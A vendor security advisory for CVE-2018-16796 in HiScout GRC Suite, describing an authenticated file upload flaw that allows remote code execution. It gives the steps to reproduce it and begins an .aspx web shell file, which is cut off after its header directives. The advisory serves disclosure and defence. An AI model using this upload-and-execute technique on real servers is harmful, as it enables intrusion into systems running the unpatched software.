Advisory ID: SYSS-2018-015 Product: HiScout GRC Suite Manufacturer: HiScout GmbH Affected Version(s): < 3.1.5 Tested Version(s): 3.1.3.12 Vulnerability Type: Unrestricted Upload of File with Dangerous Type Risk Level: High Solution Status: Fixed Manufacturer Notification: 2018-07-26 Solution Date: 2018-09-03 Public Disclosure: 2018-09-12 CVE Reference: CVE-2018-16796 Author of Advisory: Sebastian Auwaerter, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: HiScout GRC Suite is a platform for managing IT governance, risk and compliance. The manufacturer describes the various modules of the product as follows (see [1]): The HiScout ISM module is geared toward meeting the requirements of the ISO 27000 series of international standards, and provides a reliable basis for the information management systems control loop. The HiScout Grundschutz module fully supports operations toward BSI standard 100-2. HiScout Grundschutz comes geared to BSI specifications and can smoothly incorporate existing data from other tools, such as GSTOOL. The HiScout BCM module is a new generation of BCM tools that can generate quantifiable benefits even when there is no emergency, and is therefore not only used to help you to plan for circumstances that will hopefully never arise. Due to a missing check of the file extension and the content of uploaded files in place of an image, HiScout GRC Suite is vulnerable to a remote code execution vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: An authenticated attacker with the permission to edit or add a "WebSiteElement" to the "content" pages is able to upload any file with any file extension to the data directory of the application. This directory is in the web root and the uploaded file is executed on the server if ".aspx" is chosen as the file extension and if the file contains aspx source code. Any commands can be executed with the permissions of the web server user on the server by exploiting this vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC) To reproduce this issue on a German instance of HiScout GRC Suite, choose "Inhalte" -> "Neu" -> "WebSiteElement" (The english equivalent is "Content" -> "New" -> "WebSiteElement") and upload the following file to the file upload on the right-hand side of the "InfoEditor": filename: whoami.aspx ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <%@ Page Language="C#" Debug="true" Trace="false" %> <%@ Import Namespace="System.Diagnostics" %> <%@ Import Namespace="System.IO" %>